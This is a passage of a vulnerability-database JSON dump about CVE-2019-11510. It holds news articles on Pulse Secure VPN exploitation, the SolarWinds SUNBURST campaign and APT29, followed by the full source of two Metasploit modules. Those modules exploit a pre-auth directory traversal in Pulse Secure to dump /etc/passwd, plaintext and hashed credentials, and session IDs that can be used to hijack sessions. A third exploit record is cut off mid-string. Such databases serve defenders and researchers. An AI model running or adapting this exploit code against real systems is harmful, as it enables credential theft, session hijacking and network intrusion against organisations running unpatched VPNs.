Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\n[](<https://go.thn.li/2-728-6> \"password auditor\" )\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-21T17:42:28", "published": "2021-04-21T04:20:00", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-14T13:44:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-12-14T12:54:22", "published": "2020-12-14T05:44:00", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T08:30:19", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\n[](<https://go.thn.li/1-300-6> \"password auditor\" )\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\n[](<https://go.thn.li/2-728-6> \"password auditor\" )\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-16T06:47:10", "published": "2021-04-15T16:55:00", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-28T08:46:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\n[](<https://go.thn.li/1-300-5> \"password auditor\" )\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\n[](<https://go.thn.li/2-728-5> \"password auditor\" )\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-28T06:42:30", "published": "2021-04-27T09:14:00", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T20:01:09", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2019-08-21T00:00:00", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "1337DAY-ID-33140", "href": "https://0day.today/exploit/description/33140", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33140"}], "metasploit": [{"lastseen": "2020-10-15T08:03:05", "description": "This module exploits a pre-auth directory traversal in the Pulse Secure VPN server to dump an arbitrary file. Dumped files are stored in loot. If the \"Automatic\" action is set, plaintext and hashed credentials, as well as session IDs, will be dumped. Valid sessions can be hijacked by setting the \"DSIG\" browser cookie to a valid session ID. For the \"Manual\" action, please specify a file to dump via the \"FILE\" option. /etc/passwd will be dumped by default. If the \"PRINT\" option is set, file contents will be printed to the screen, with any unprintable characters replaced by a period. Please see related module exploit/linux/http/pulse_secure_cmd_exec for a post-auth exploit that can leverage the results from this module.\n", "published": "2019-08-21T20:58:58", "type": "metasploit", "title": "Pulse Secure VPN Arbitrary File Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11510"], "modified": "2020-01-14T06:34:06", "id": "MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',\n 'Description' => %q{\n This module exploits a pre-auth directory traversal in the Pulse Secure\n VPN server to dump an arbitrary file. Dumped files are stored in loot.\n\n If the \"Automatic\" action is set, plaintext and hashed credentials, as\n well as session IDs, will be dumped. Valid sessions can be hijacked by\n setting the \"DSIG\" browser cookie to a valid session ID.\n\n For the \"Manual\" action, please specify a file to dump via the \"FILE\"\n option. /etc/passwd will be dumped by default. If the \"PRINT\" option is\n set, file contents will be printed to the screen, with any unprintable\n characters replaced by a period.\n\n Please see related module exploit/linux/http/pulse_secure_cmd_exec for\n a post-auth exploit that can leverage the results from this module.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery (@orange_8361)\n 'Meh Chang', # Discovery (@mehqq_)\n 'Alyssa Herrera', # PoC (@Alyssa_Herrera_)\n 'Justin Wagner', # Module (@0xDezzy)\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2019-11510'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],\n ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],\n ['URL', 'https://hackerone.com/reports/591295']\n ],\n 'DisclosureDate' => '2019-04-24', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Automatic', 'Description' => 'Dump creds and sessions'],\n ['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']\n ],\n 'DefaultAction' => 'Automatic',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'HttpClientTimeout' => 5 # This seems sane\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']\n }\n ))\n\n register_options([\n OptString.new(\n 'FILE',\n [\n true,\n 'File to dump (manual mode only)',\n '/etc/passwd'\n ]\n ),\n OptBool.new(\n 'PRINT',\n [\n false,\n 'Print file contents (manual mode only)',\n true\n ]\n )\n ])\n end\n\n def the_chosen_one\n return datastore['FILE'], 'User-chosen file'\n end\n\n def run\n files =\n case action.name\n when 'Automatic'\n print_status('Running in automatic mode')\n\n # Order by most sensitive first\n [\n plaintext_creds,\n session_ids,\n hashed_creds\n ]\n when 'Manual'\n print_status('Running in manual mode')\n\n # /etc/passwd by default\n [the_chosen_one]\n end\n\n files.each do |path, info|\n print_status(\"Dumping #{path}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => dir_traversal(path),\n 'partial' => true # Allow partial response due to timeout\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Could not dump #{path}\")\n end\n\n handle_response(res, path, info)\n end\n end\n\n def handle_response(res, path, info)\n case res.code\n when 200\n case action.name\n when 'Automatic'\n # TODO: Parse plaintext and hashed creds\n if path == session_ids.first\n print_status('Parsing session IDs...')\n\n parse_sids(res.body).each do |sid|\n print_good(\"Session ID found: #{sid}\")\n end\n end\n when 'Manual'\n printable = res.body.gsub(/[^[:print:][:space:]]/, '.')\n\n print_line(printable) if datastore['PRINT']\n end\n\n print_good(store_loot(\n self.name, # ltype\n 'application/octet-stream', # ctype\n rhost, # host\n res.body, # data\n path, # filename\n info # info\n ))\n when 302\n fail_with(Failure::NotVulnerable, \"Redirected to #{res.redirection}\")\n when 400\n print_error(\"Invalid path #{path}\")\n when 404\n print_error(\"#{path} not found\")\n else\n print_error(\"I don't know what a #{res.code} code is\")\n end\n end\n\n def dir_traversal(path)\n normalize_uri(\n '/dana-na/../dana/html5acc/guacamole/../../../../../..',\n \"#{path}?/dana/html5acc/guacamole/\" # Bypass query/vars_get\n )\n end\n\n def parse_sids(body)\n body.to_s.scan(/randomVal([[:xdigit:]]+)/).flatten.reverse\n end\n\n def plaintext_creds\n return '/data/runtime/mtmp/lmdb/dataa/data.mdb', 'Plaintext credentials'\n end\n\n def session_ids\n return '/data/runtime/mtmp/lmdb/randomVal/data.mdb', 'Session IDs'\n end\n\n def hashed_creds\n return '/data/runtime/mtmp/system', 'Hashed credentials'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/pulse_secure_file_disclosure.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "description": "\nPulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "edition": 1, "published": "2019-08-21T00:00:00", "title": "Pulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "href": "", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\n# Google Dork: inurl:/dana-na/ filetype:cgi\n# Date: 8/20/2019\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\n# Vendor Homepage: https://pulsesecure.net\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n# Tested on: Linux\n# CVE : CVE-2019-11510 \nrequire 